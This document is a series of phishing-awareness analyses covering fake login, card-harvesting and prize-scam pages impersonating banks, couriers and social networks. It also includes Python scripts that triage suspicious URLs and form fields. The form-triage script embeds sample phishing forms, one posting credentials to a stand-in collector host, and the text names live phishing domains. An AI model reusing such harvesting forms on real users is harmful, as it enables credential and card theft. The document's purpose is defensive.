IAA phishing page detected (online vehicle auction marketplace)

This screenshot shows a phishing page impersonating IAA (Insurance Auto Auctions), a legitimate online vehicle auction platform. The page is designed to steal the email and password victims use to log in to their IAA accounts.


Threat Analysis: IAA Phishing – Credential Harvesting

How it works:
The victim receives a phishing email, SMS, or message claiming an issue with their IAA account (e.g., a bid alert, payment problem, or account suspension). The link leads to this fake login page. The victim enters their email and password and clicks “Log In.” The credentials are captured and sent to the attacker.

The goal:
The attacker aims to steal IAA account credentials to:

  • Access the victim’s auction account
  • View bidding history, payment information, and personal data
  • Place fraudulent bids or transfer vehicles
  • Use the same email/password combination to compromise other accounts (if the victim reuses credentials)

Red flags to watch for:

  • Suspicious URL: The page is hosted at videooprema.in.rs/iaai.com/ – the brand appears only in the path, while the registrable domain, the part that actually identifies the site, is videooprema.in.rs. Legitimate IAA login pages are on iaai.com and its subdomains.
  • Generic design: The page is minimal and lacks the full branding, security notices, and personalized elements found on the real IAA login page.
  • No multi‑factor authentication prompt: A genuine login may ask for a second factor after the password; this page simply accepts the credentials. Treat this as a weak signal only – a phishing kit does not need an MFA step to succeed, and some kits relay the victim’s one‑time code to the real site in real time.
  • Unsolicited login request: A message that pushes you to log in through its own link to fix an “account problem” is the classic lure. Resolve account issues by going to the site directly, never through the link.

What to do if you encounter this:

  • Do not enter your email or password.
  • If you are an IAA customer, always access the site by typing iaai.com directly into your browser.
  • If you have already entered your credentials, change your IAA password immediately. If you use the same password elsewhere, change those accounts as well. Enable two‑factor authentication on your IAA account if available.
  • Report the phishing page to IAA’s security team.

Protective measures:

  • Bookmark the official IAA login page and use that bookmark.
  • Use a password manager – it offers saved credentials only on the domain they were saved for, so a login page that gets no autofill is itself a warning.
  • Enable two‑factor authentication on your IAA account and email.
  • Be suspicious of any unsolicited message that asks you to log in.

DHL phishing page revealed

This screenshot shows a phishing page impersonating DHL, targeting users with a fake package delivery notification. The scam demands a small payment (1.99) to complete delivery and collects full card details, cardholder name, and an ID number (likely a national ID or passport).


Threat Analysis: DHL Phishing – Fake “Delivery Confirmation” & Card Harvesting

How it works:
The victim receives an SMS or email claiming a package is in transit and requires a small payment to complete delivery. The link leads to this page, which mimics DHL’s tracking interface. It displays:

  • A fake tracking code
  • A fake status (“in delivering” – ungrammatical wording that a courier’s real tracking page would not show)
  • A message urging payment within a limited time (14 days)

The victim is asked to provide:

  • Cardholder name
  • ID number (national identification)
  • Full credit card number
  • Expiration date (MM/YY)
  • CVV (CVC)

The goal:
The attacker captures:

  • Full card details (number, expiry, CVV) – everything needed for card‑not‑present fraud
  • Cardholder name and ID number – usable for identity theft or to pass the knowledge‑based checks that banks and merchants rely on

The 1.99 “fee” is not the goal; it is the pretext that makes typing in card details feel routine.

Red flags to watch for:

  • Suspicious URL: The page is hosted on a domain that is not dhl.com or an official DHL domain.
  • Request for an ID number alongside full card data: A courier has no reason to ask for your national ID number to deliver a parcel. Combined with the card number, expiry and CVV on a page that is not on a DHL domain, this is a harvesting form, not a payment form.
  • Small fee trick: 1.99 is a trivial amount meant to make the payment seem insignificant.
  • Fake tracking code: The tracking code returns nothing when entered on the real DHL tracking page.
  • Poor English / formatting: The page contains grammatical inconsistencies that would not appear on an official DHL page.

What to do if you encounter this:

  • Do not enter any personal, ID, or card information.
  • If you are expecting a DHL shipment, track it directly by typing dhl.com into your browser.
  • If you have already entered card details, contact your bank immediately to block the card.
  • Report the phishing page to DHL’s fraud team.

Protective measures:

  • Never click links in unsolicited delivery messages. Always go directly to the official courier website.
  • Never pay a “redelivery” or customs fee through a link in a message. If a genuine charge exists, it will appear when you enter your tracking number yourself on the official DHL site.
  • Check the URL carefully: Official DHL domains end with dhl.com or country-specific variants like dhl.de. Look at the registrable domain, not at whether “dhl” appears somewhere in the address.
  • Enable transaction alerts on your bank account.

Twitter fake login page detected

This screenshot shows a phishing page impersonating Twitter (now X), designed to steal login credentials (email/phone/username and password). The page is hosted on a suspicious domain unrelated to Twitter.


Threat Analysis: Twitter Phishing – Credential Harvesting

How it works:
The victim receives a phishing email, SMS, or direct message claiming a security alert, account suspension, or unusual login activity. The link leads to this fake Twitter login page. The victim enters their phone, email, or username and password, then clicks “Login.” The credentials are captured and sent to the attacker.

The goal:
The attacker steals Twitter account credentials to:

  • Access private messages and personal information
  • Post spam or malicious links from a trusted account
  • Spread the phishing attack to the victim’s followers
  • Use the same email/password combination to compromise other accounts (if credentials are reused)

Red flags to watch for:

  • Suspicious URL: The page is hosted on obgyn.click, not twitter.com or x.com. Legitimate Twitter login pages are only on official domains.
  • Generic design: The page copies Twitter’s interface, but it is a static clone – the footer links lead nowhere and the brand is absent from the address bar. A padlock or valid certificate proves nothing here: phishing hosts obtain free TLS certificates too.
  • Unsolicited login request: A message that pushes you to log in through its own link to fix an “account problem” is the classic lure; open the site directly instead.
  • No two‑factor authentication prompt: A real login may ask for a second factor after the password; this page does not. This is a weak signal only – the kit already has the password, and some kits relay one‑time codes in real time.

What to do if you encounter this:

  • Do not enter your login credentials.
  • If you have already entered them, change your Twitter password immediately and enable two‑factor authentication (2FA). Also change any other accounts that use the same password.
  • Always access Twitter by typing twitter.com or x.com directly into your browser.

Protective measures:

  • Bookmark the official Twitter login page and use that bookmark.
  • Use a password manager – it will not offer your saved twitter.com / x.com credentials on any other domain.
  • Enable two‑factor authentication on your Twitter account (using an authenticator app or security key, not SMS).
  • Be suspicious of any unsolicited message that asks you to log in.

Gmail phishing page detected

This screenshot shows a phishing page impersonating Google / Gmail, targeting users who read Arabic and French (likely in North Africa or the Middle East). The page asks for email/phone and password to steal login credentials.


Threat Analysis: Google/Gmail Phishing – Credential Harvesting

How it works:
The victim receives a phishing email, SMS, or message claiming a security alert, account issue, or the need to verify their information. The link leads to this page, which mimics the Gmail login interface. The victim enters their email/phone and password, then clicks “LOGIN.” The credentials are captured and sent to the attacker.

The goal:
The attacker steals Google account credentials to:

  • Access Gmail (searching for sensitive information, password reset links)
  • Compromise other Google services (Drive, Photos, etc.)
  • Use the account to send further phishing messages to the victim’s contacts
  • Attempt credential reuse on other platforms

Red flags to watch for:

  • Suspicious URL: The page is hosted on a domain that is not google.com (Google sign‑in lives at accounts.google.com).
  • Mixed languages: The page uses Arabic for the title (“تسجيل الدخول” – “log in”) but French for the field labels (“Gmail ou téléphone” – “Gmail or phone”). Official Google login pages are consistently localized in one language.
  • Minimal design: The page lacks Google’s branding, layout and account‑chooser elements.
  • No two‑step flow: Google’s real sign‑in asks for the email first and shows the account name and profile picture on a separate password step. A single form that takes email and password together is not how accounts.google.com behaves.
  • Unsolicited login request: A message that pushes you to log in through its own link to fix an “account problem” is the classic lure; open the site directly instead.

What to do if you encounter this:

  • Do not enter your email/phone or password.
  • If you have already entered your credentials, change your Google password immediately, enable two‑factor authentication (2FA), and review the account’s recent security activity and signed‑in devices for sessions you do not recognise.
  • Always access Gmail by typing gmail.com directly into your browser.

Protective measures:

  • Bookmark the official Google login page and use that bookmark.
  • Use a password manager – it will autofill only on legitimate google.com domains.
  • Enable two‑factor authentication on your Google account (using an authenticator app or security key).
  • Be suspicious of any unsolicited message that asks you to log in.

Fake Microsoft account creation page detected

This phishing campaign uses a high-fidelity clone of the Microsoft account creation page to steal credentials, personal data, and backup contact information under the guise of creating a new profile. The fake form, which typically appears after clicking a deceptive link, captures the “new” password – frequently a recycled primary password – along with PII that feeds account‑recovery and security‑question flows on the victim’s real accounts. To stay safe, users should verify that the registrable domain in the address bar is microsoft.com, live.com, or outlook.com and type addresses manually rather than clicking links.

Screenshot #1: The Data Entry Form

The Trap: The page is a pixel-perfect replica of the live.com registration screen. It asks for a new email address and a password.

The Psychology: Victims feel safe because they believe they are creating information, not giving it away. But many people reuse one or two passwords across services. Once you click “Next,” your “new” password is sent directly to the attacker’s server.

Screenshot #2: Personal Data Collection

The Trap: After the password, the kit asks for First Name, Last Name, and Date of Birth.

The Intent: This is “fullz” harvesting (criminal‑market slang for a complete identity record). The data is used to answer security questions on your real accounts or to commit identity theft and open fraudulent credit lines.

Screenshot #3: Verification & Backup Data

The Trap: The final step often asks for a Backup Email or Phone Number.

The Impact: By capturing your recovery methods, the attacker learns which phone number and backup email guard your other accounts (email, social media, banking) and can aim password‑reset and interception attempts at exactly those channels.

The victim is then redirected to the genuine Microsoft website:

Fake Microsoft Account Creation Page

Target: Global users of Outlook, OneDrive, and Azure services.
Threat Level: Critical (Credential Harvesting & Identity Theft)

Phishing Method Description

This attack targets users by mimicking the official Microsoft account creation (Sign-up) flow. Instead of stealing an existing password, scammers trick victims into “registering” for a new service or “validating” their identity. The goal is to capture a fresh set of credentials (Email + Password) which the victim likely reuses for other sensitive accounts.

Protection Measures

  • 1. Check the registrable domain, not the look of the page:
    Official Microsoft account sign‑up happens only on microsoft.com, live.com, or outlook.com. The part that matters is the domain immediately before the first path slash; names like microsoft-account-verify.net or signup-live.xyz merely contain the brand word. If you see a URL like that, close the tab immediately.
  • 2. The “Recycled Password” Danger:
    Never use your primary password when “registering” for a new, unknown service. Scammers rely on the fact that you will likely reuse your “standard” strong password, which they can then test against your banking and social media accounts.
  • 3. Look past the “Padlock”:
    Most phishing sites now use HTTPS, so the lock icon proves nothing. What you can check is who the certificate was issued to: click the padlock and confirm the certificate names the domain you expected. Microsoft’s certificates are issued to Microsoft Corporation; a certificate for a random hostname with no organisation listed, on a page claiming to be Microsoft, is a scam.
  • 4. Use a Password Manager:
    A password manager (like Bitwarden or 1Password) will refuse to auto-fill your data if the domain differs even slightly from the real one. This is your best technical defense against lookalike sites – provided you let it fill and do not paste the password in by hand.
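
The domain checks in these write‑ups (the IAA page at videooprema.in.rs/iaai.com/, the Twitter page on obgyn.click, and the lookalike microsoft-account-verify.net / signup-live.xyz names above) all come down to one question: what is the registrable domain, and does the brand appear there or somewhere else? The Python below is an added example, not code from the original page: it reduces a URL to its registrable domain against a hand‑picked subset of the Public Suffix List and reports where any brand token sits. The suffix subset, the brand table and the account-check.example host are assumptions constructed for the example; a production tool would load the full Public Suffix List.

```python
"""Lexical URL triage for brand-impersonating phishing pages.

Added example, not code from the original page. PUBLIC_SUFFIXES is a hand-picked
subset of the Public Suffix List and BRANDS is built from the domains the write-ups
name; both are assumptions for this example. Production tooling should load the
full Public Suffix List (publicsuffix.org) and maintain its own brand table.
"""
from __future__ import annotations

import re
from urllib.parse import urlsplit

# Constructed subset of the Public Suffix List (the real list has thousands of rules).
PUBLIC_SUFFIXES = {"com", "net", "org", "xyz", "click", "example",
                   "de", "fr", "bo", "com.bo", "rs", "in.rs", "co.rs"}

# Organisation -> (tokens that signal the brand, registrable domains the write-ups call official)
BRANDS = {
    "IAA":             ({"iaai"}, {"iaai.com"}),
    "DHL":             ({"dhl"}, {"dhl.com", "dhl.de"}),
    "Twitter/X":       ({"twitter"}, {"twitter.com", "x.com"}),
    "Google":          ({"google", "gmail"}, {"google.com"}),
    "Microsoft":       ({"microsoft", "live", "outlook"}, {"microsoft.com", "live.com", "outlook.com"}),
    "Bank of America": ({"bankofamerica"}, {"bankofamerica.com"}),
    "Banco Fie":       ({"bancofie", "fienet"}, {"bancofie.com.bo"}),
    "Credit Agricole": ({"agricole", "securipass"}, {"credit-agricole.fr"}),
}


def registrable_domain(host: str) -> str:
    """eTLD+1: longest matching public suffix plus one label (what a password manager matches on)."""
    labels = host.lower().rstrip(".").split(".")
    for i in range(len(labels)):
        if ".".join(labels[i:]) in PUBLIC_SUFFIXES:
            return ".".join(labels[max(i - 1, 0):])
    return ".".join(labels[-2:])  # unknown suffix: fall back to the last two labels


def tokens(text: str) -> set[str]:
    """Split on anything that is not a letter or digit: 'signup-live.xyz' -> {'signup', 'live', 'xyz'}."""
    return {t for t in re.split(r"[^a-z0-9]+", text.lower()) if t}


def triage_url(url: str) -> dict:
    """Return the registrable domain, a verdict and the reasons behind it for one URL."""
    parts = urlsplit(url if "://" in url else "http://" + url)
    host = (parts.hostname or "").lower()
    reg = registrable_domain(host)
    subdomain = host[: -len(reg) - 1] if host != reg else ""
    reasons: list[str] = []
    for org, (brand_tokens, official) in BRANDS.items():
        if reg in official:
            return {"url": url, "registrable_domain": reg, "verdict": "official",
                    "brand": org, "reasons": []}
        if brand_tokens & tokens(reg):
            reasons.append(f"{org} token inside lookalike registrable domain '{reg}'")
        if brand_tokens & tokens(subdomain):
            reasons.append(f"{org} token only in subdomain '{subdomain}'")
        if brand_tokens & tokens(parts.path):
            reasons.append(f"{org} token in path '{parts.path}'")
    verdict = "brand_impersonation" if reasons else "no_brand_reference"
    return {"url": url, "registrable_domain": reg, "verdict": verdict, "brand": None, "reasons": reasons}


# URLs from the write-ups above plus one constructed subdomain case (account-check.example).
SAMPLE_URLS = [
    "https://videooprema.in.rs/iaai.com/",          # IAA: brand only in the path
    "https://microsoft-account-verify.net/signup",  # Microsoft: brand inside a lookalike domain
    "https://signup-live.xyz/",                     # Microsoft: 'live' inside a lookalike domain
    "https://obgyn.click/login",                    # Twitter: nothing lexical gives it away
    "https://iaai.com.account-check.example/",      # constructed: brand only in the subdomain
    "https://www.iaai.com/",                        # official
    "https://login.live.com/",                      # official
]

if __name__ == "__main__":
    for u in SAMPLE_URLS:
        r = triage_url(u)
        print(f"{r['verdict']:<20} {r['registrable_domain']:<28} {u}")
        for reason in r["reasons"]:
            print("    -", reason)
```

obgyn.click comes back as no_brand_reference: nothing in that URL names Twitter, so lexical checks alone miss it and the page content has to be inspected. The registrable‑domain comparison is also what a password manager performs before offering saved credentials, which is why it will not fill twitter.com credentials on obgyn.click.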

Fake Instagram follower-boosting page detected

This screenshot shows a phishing page in Arabic that promises to increase the number of followers for a social media account (likely Instagram, TikTok, or Twitter). The victim is asked to provide their username, password, and desired number of followers – a classic credential‑harvesting scam.


Threat Analysis: Social Media Follower Booster Phishing – Credential Harvesting

How it works:
The victim encounters an ad, email, or direct message promoting a free or cheap service to gain thousands of followers instantly. The link leads to this page, which asks for:

  • Username (social media login name)
  • Password
  • Desired number of followers (to make the offer seem customizable)

After the victim submits this information, the attacker captures the credentials. The victim may be redirected to a fake “processing” page or asked to complete a “verification” (e.g., a human verification survey), but the damage is already done.
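
Each of the harvesting forms described in this corpus is recognisable from the fields it asks for: password plus username (IAA, Twitter, Gmail), full card data plus an ID number (DHL), or password plus a follower count (this page). The Python below is an added example, not code from the original page or from any phishing kit: it parses the HTML of a suspected page, categorises each form field from its name, placeholder, type, autocomplete attribute and label text, reports where the form submits, and names the harvesting pattern. The three HTML snippets, the field names, the collector.example host and the phish-host.example page host are constructed for the example.

```python
"""Form-field triage for suspected phishing pages.
Added example, not code from the original page or from any phishing kit. The HTML snippets
are constructed after the forms described in this corpus; field names, collector.example
and phish-host.example are assumptions."""
from __future__ import annotations
import re
from html.parser import HTMLParser
from urllib.parse import urlsplit

# Category -> pattern, matched against a field's type, name, id, placeholder, autocomplete
# value and <label for=...> text. First match wins, so the more specific categories come first.
FIELD_PATTERNS = [
    ("password",       r"passw|pwd|contrase|mot.?de.?passe"),
    ("card_cvv",       r"cvv|cvc|csc|security.?code"),
    ("card_expiry",    r"\bexp|mm.?/.?yy|valid.?(thru|until)"),
    ("cardholder",     r"holder|name.?on.?card"),
    ("card_number",    r"card.?(num|no)|cc.?num|\bpan\b|tarjeta"),
    ("national_id",    r"\bid.?(num|number)|passport|national|\bdni\b|cedula"),
    ("follower_count", r"follow|subscri|abonn|seguidor"),
    ("identifier",     r"user|usuario|login|e-?mail|phone|\btel|ident"),
]

# Field-category combinations and the harvesting pattern they indicate.
VERDICT_RULES = [
    ({"password", "identifier"},     "credential harvesting"),
    ({"card_number", "card_cvv"},    "full card harvesting (PAN + CVV)"),
    ({"national_id"},                "identity data (ID/passport number)"),
    ({"password", "follower_count"}, "follower-booster credential lure"),
]


def categorize(descriptor: str) -> str:
    """Map one field's combined descriptor text to a category; 'other' if nothing matches."""
    return next((cat for cat, pat in FIELD_PATTERNS if re.search(pat, descriptor, re.I)), "other")


class FormCollector(HTMLParser):
    """Collects every <form> with its action and the raw descriptor of each field inside it."""

    def __init__(self) -> None:
        super().__init__()
        self.forms: list[dict] = [{"action": "", "fields": []}]  # index 0: fields outside any <form>
        self.labels: dict[str, str] = {}                        # <label for=ID> -> label text
        self._label_for: str | None = None                      # id of the <label> being read

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag == "form":
            self.forms.append({"action": a.get("action") or "", "fields": []})
        elif tag in ("input", "select", "textarea"):
            descriptor = " ".join(a.get(k) or "" for k in ("type", "name", "id", "placeholder", "autocomplete"))
            self.forms[-1]["fields"].append({"name": a.get("name") or a.get("id") or tag,
                                             "id": a.get("id") or "", "descriptor": descriptor})
        elif tag == "label":
            self._label_for = a.get("for") or ""

    def handle_data(self, data):
        if self._label_for is not None:   # accumulate the visible label text for its target field
            self.labels[self._label_for] = (self.labels.get(self._label_for, "") + " " + data).strip()

    def handle_endtag(self, tag):
        if tag == "label":
            self._label_for = None


def action_note(action: str, page_host: str) -> str:
    """Describe where the form submits relative to the page that hosts it."""
    target = urlsplit(action)
    if target.hostname and target.hostname.lower() != page_host.lower():
        return f"submits to third-party host {target.hostname}"
    if target.path.lower().endswith(".php"):
        return f"submits to server-side script {target.path} on the page's own host"
    return "submits to the page's own host"


def analyze_page(html: str, page_host: str) -> list[dict]:
    """Return, for each form on the page, its categorised fields, where it submits and the verdicts."""
    parser = FormCollector()
    parser.feed(html)
    results = []
    for form in (f for f in parser.forms if f["fields"]):
        fields = [(f["name"], categorize(f["descriptor"] + " " + parser.labels.get(f["id"], "")))
                  for f in form["fields"]]
        cats = {cat for _, cat in fields}
        results.append({"action": form["action"], "action_note": action_note(form["action"], page_host),
                        "fields": fields, "verdicts": [v for needed, v in VERDICT_RULES if needed <= cats]})
    return results


# Constructed samples modelled on the forms described above (not captured kit code).
DHL_FORM = """<form action="pay.php" method="post">
  <label for="holder">Cardholder name</label><input id="holder" name="holder">
  <label for="idn">ID number</label><input id="idn" name="id_number">
  <label for="cc">Card number</label><input id="cc" name="card_number" autocomplete="cc-number">
  <input name="exp" placeholder="MM/YY"><input name="cvc" placeholder="CVC" maxlength="3"><button>Pay 1.99</button></form>"""
IAA_FORM = """<form action="https://collector.example/post.php" method="post"><input type="email" name="email" placeholder="Email">
  <input type="password" name="password" placeholder="Password"><button>Log In</button></form>"""
BOOSTER_FORM = """<form action="/go.php" method="post"><input name="username" placeholder="Username">
  <input type="password" name="password"><select name="followers"><option>1000</option><option>5000</option></select></form>"""

if __name__ == "__main__":
    for title, html in (("DHL card form", DHL_FORM), ("IAA login", IAA_FORM), ("Follower booster", BOOSTER_FORM)):
        for form in analyze_page(html, "phish-host.example"):
            print(f"{title}: {form['action_note']}; verdicts={form['verdicts']}; fields={form['fields']}")
```

Legitimate login pages ask for passwords too, so this is triage for a page already suspected, for instance by its domain: it tells the analyst what the kit wants and whether the data leaves for a third‑party host or lands in a PHP script on the same server. The label‑ and placeholder‑based matching is what lets it classify a Spanish “Contraseña” or “Identificación en línea” field without a separate rule set.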

The goal:
The attacker steals social media account credentials to:

  • Take over the account and lock out the original owner
  • Post spam, scams, or malicious links from a trusted account
  • Use the account to send phishing messages to the victim’s followers
  • Sell the account or its data on criminal markets

Red flags to watch for:

  • Suspicious URL: The page is hosted on a domain that is not the official social media platform (e.g., not instagram.com, tiktok.com, or twitter.com).
  • Request for password: No legitimate follower‑boosting service requires your account password. This is always a scam.
  • Too good to be true offer: Promises of instant, free, or cheap followers are classic lures for credential theft.
  • Poor design and generic Arabic phrasing: The page lacks the branding and security features of the real platform.

What to do if you encounter this:

  • Do not enter your username or password.
  • If you have already entered your credentials, change your password immediately on the real social media platform. Enable two‑factor authentication (2FA) if available.
  • Report the phishing page to the social media platform being impersonated.

Protective measures:

  • Never share your password with any third‑party service claiming to boost followers, likes, or views.
  • Use a password manager – it will not autofill on fake domains.
  • Enable two‑factor authentication on all social media accounts.
  • Be suspicious of any unsolicited offer that promises easy growth for your account.

Lowe’s fake winning page detected

This screenshot shows a lottery or prize scam impersonating Lowe’s, a major home improvement retailer. The message claims the victim has won a prize and includes a fake customer number. The scam typically demands a small “delivery fee” to release the prize – which is never actually delivered.


Threat Analysis: Lowe’s Prize Scam – Advance Fee Fraud

How it works:
The victim receives an unsolicited email, SMS, or social media message claiming they have won a prize (often a gift card, appliance, or cash) from Lowe’s. A “customer number” is provided to make the notification appear legitimate. The message mentions that a delivery fee may apply. If the victim responds or clicks a link, they will be asked to pay a small fee (e.g., $5–$20) to “cover shipping” or “processing” before receiving the prize. After the fee is paid, the victim never receives the promised prize – and their payment information may be stolen.

The goal:
The attacker aims to:

  • Trick the victim into sending money (advance fee fraud)
  • Collect credit card or bank account details if the victim pays online
  • Gather personal information (name, address, phone) for identity theft or further scams

Red flags to watch for:

  • Unsolicited win notification: Legitimate sweepstakes do not notify winners via random text messages or social media DMs without prior entry.
  • Request for upfront payment: A real prize never requires a delivery or processing fee to be paid by the winner. The sponsor covers these costs.
  • Fake customer number: The provided number (#4864370221) is generic and cannot be verified with any legitimate Lowe’s promotion.
  • Vague prize description: The message does not specify what the winner has actually won – only that they are a “winner.”
  • Poor formatting and grammar: Official Lowe’s communications are professionally written; this message uses generic capitalization and lacks official branding.

What to do if you encounter this:

  • Do not reply, click any links, or call any phone number provided.
  • Do not pay any “delivery fee” or share personal / financial information.
  • If you are unsure whether a Lowe’s promotion is legitimate, contact Lowe’s directly through their official website (lowes.com) – never use contact details from the suspicious message.
  • Report the scam to the Federal Trade Commission (reportfraud.ftc.gov) or your local consumer protection agency.

Why this scam is effective:
The promise of a free prize excites victims, and a small delivery fee seems reasonable. Many people are familiar with Lowe’s and trust the brand. The fake customer number adds a veneer of authenticity. Scammers rely on urgency and the fear of missing out to bypass critical thinking.

Protective measures:

  • Remember: you cannot win a prize you did not enter. If you never signed up for a Lowe’s sweepstakes, ignore any win notification.
  • Never pay money to receive a prize. Legitimate contests cover all costs.
  • Delete unsolicited win messages without responding.
  • Check the sender’s address – official Lowe’s emails come from @lowes.com, not random domains. The reverse is not a guarantee: a From address can be forged, so a correct‑looking domain does not by itself prove a message genuine.

BancoFie phishing page detected

This screenshot shows a phishing page impersonating Banco Fie, a Bolivian bank. The page mimics the bank’s “Fienet” online banking login interface to steal customers’ USUARIO (username) and Contraseña (password).


Threat Analysis: Banco Fie Phishing – Fake “Fienet” Login Page

How it works:
The victim receives a phishing email, SMS, or other message claiming a security alert, account issue, or the need to verify their information. The link leads to this fake Banco Fie login page. The victim is asked to enter their username and password and click “Continuar.” The credentials are captured and sent to the attacker.

The goal:
The attacker aims to steal online banking credentials to access the victim’s real account, view balances, transfer funds, and commit fraud.

Red flags to watch for:

  • Suspicious URL: The page is hosted on a domain that is not bancofie.com.bo, Banco Fie’s official domain (.bo is Bolivia’s country code). Always check the address bar.
  • Unsolicited login request: A message that pushes you to log in through its own link to fix an “account problem” is the classic lure. Customers should always reach online banking by typing the official URL directly.
  • Fake security badges: The “secure,” “GlobalSign,” and “GMO” icons are copied from legitimate sites but do not guarantee safety – they are just images on a fake page.
  • No personalization or security image: If your bank shows a security phrase or image after username entry, its absence is a warning. This page has no such step and simply takes both fields at once.
  • Copied contact information: The footer includes a real customer service phone number and website, but attackers copy these to appear legitimate. Their presence does not make the page safe.

What to do if you encounter this:

  • Do not enter your username or password.
  • If you are a Banco Fie customer, always access Fienet by typing bancofie.com.bo directly into your browser.
  • If you have already entered your credentials, contact Banco Fie immediately through their official customer service hotline to change your password and secure your account.
  • Report the phishing page to Banco Fie’s fraud department.

Protective measures:

  • Bookmark the official Banco Fie login page and use that bookmark exclusively.
  • Use a password manager – it will autofill only on legitimate domains.
  • Enable two‑factor authentication on your bank account if available.
  • Be suspicious of any unsolicited message that creates urgency and asks you to log in.

Bank of America phishing page in Spanish revealed

This screenshot shows a phishing page impersonating Bank of America, targeting Spanish‑speaking customers. The page mimics the bank’s online login interface to steal online banking credentials (Identificación en línea and Contraseña).


Threat Analysis: Bank of America Phishing – Fake Spanish‑Language Login Page

How it works:
The victim receives a phishing email, SMS, or other message claiming a security alert, account issue, or the need to verify their information. The link leads to this fake login page. The victim is asked to enter their online ID and password and click “Entrar.” The credentials are captured and sent to the attacker.

The goal:
The attacker aims to steal online banking credentials to access the victim’s real Bank of America account, view balances, transfer funds, and commit fraud.

Red flags to watch for:

  • Suspicious URL: The page is hosted on a domain that is not bankofamerica.com. Legitimate Bank of America login pages are only on official bank domains.
  • Unsolicited login request: A message that pushes you to log in through its own link to fix an “account problem” is the classic lure; open the bank’s site directly instead.
  • Outdated copyright: The footer shows “© 2021” – the page was cloned once and never maintained. On its own a stale year is weak evidence, but it fits the pattern.
  • No step‑up verification: The real Bank of America login may challenge an unrecognised device with a one‑time code sent to your registered phone or email before showing any account data. A static page that takes the online ID and password and leads nowhere is a kit.
  • Copied content: The page uses real Bank of America branding and slogans (“Área protegida,” “Miembro de FDIC”), but these are copied from the legitimate site and do not guarantee safety.

What to do if you encounter this:

  • Do not enter your online ID or password.
  • If you are a Bank of America customer, always access online banking by typing bankofamerica.com directly into your browser.
  • If you have already entered your credentials, contact Bank of America immediately to change your password and secure your account.
  • Report the phishing page to Bank of America’s fraud team, using the reporting address the bank publishes on bankofamerica.com.

Protective measures:

  • Bookmark the official Bank of America login page and use that bookmark.
  • Use a password manager – it will autofill only on legitimate bankofamerica.com domains.
  • Enable two‑factor authentication on your bank account.
  • Be suspicious of any unsolicited message that asks you to log in.

Crédit Agricole phishing lure (fake SécuriPass activation) revealed

This screenshot shows a phishing email or landing page impersonating Crédit Agricole, a major French bank. The message uses the legitimate “SécuriPass” security feature and the European PSD2 directive as a pretext to pressure victims into clicking a malicious activation button.


Threat Analysis: Crédit Agricole Phishing – Fake “SécuriPass Activation” Scam

How it works:
The victim receives an unsolicited email (or lands on this page via a link) claiming that, because of the PSD2 directive, strong authentication must be renewed every 90 days. PSD2 does require banks to re‑apply strong customer authentication periodically for online account access, which is what makes the pretext plausible. The message urges the victim to click a button to activate “SécuriPass” and warns that ignoring the activation will release the bank from liability for any account damage.

Clicking the button leads to a fake Crédit Agricole login page designed to steal the victim’s online banking credentials and potentially two‑factor authentication codes.

The goal:
The attacker aims to capture the victim’s Crédit Agricole login credentials to access the account, transfer funds, and commit fraud.

Red flags to watch for:

  • Suspicious URL: The link behind the button leads to a domain that is not credit-agricole.fr. Legitimate bank communications use official domains.
  • Threat of consequences: The warning that the bank “will not be responsible for damages” is a classic fear tactic to pressure victims into clicking without thinking.
  • Unsolicited activation request: Legitimate SécuriPass activation happens inside the official Crédit Agricole app or after logging in on the bank’s own site, not through a button in an email.
  • Generic greeting: The message does not address the victim by name or reference a specific account.
  • Misspelling: “NOTIFICATIATION” instead of “Notification” is a minor but telling error.

What to do if you encounter this:

  • Do not click the activation button or any links.
  • Access your Crédit Agricole account by typing credit-agricole.fr directly into your browser or using the official mobile app.
  • If you have already clicked and entered your credentials, contact Crédit Agricole immediately to secure your account.
  • Report the phishing page to Crédit Agricole’s fraud team, using the reporting contact published on credit-agricole.fr.

Protective measures:

  • Never click links in unsolicited messages claiming you need to activate security features.
  • Always type your bank’s official website address directly into your browser.
  • Enable SécuriPass through the official app – not via email links.
  • Be suspicious of any message that threatens negative consequences and asks you to click a link.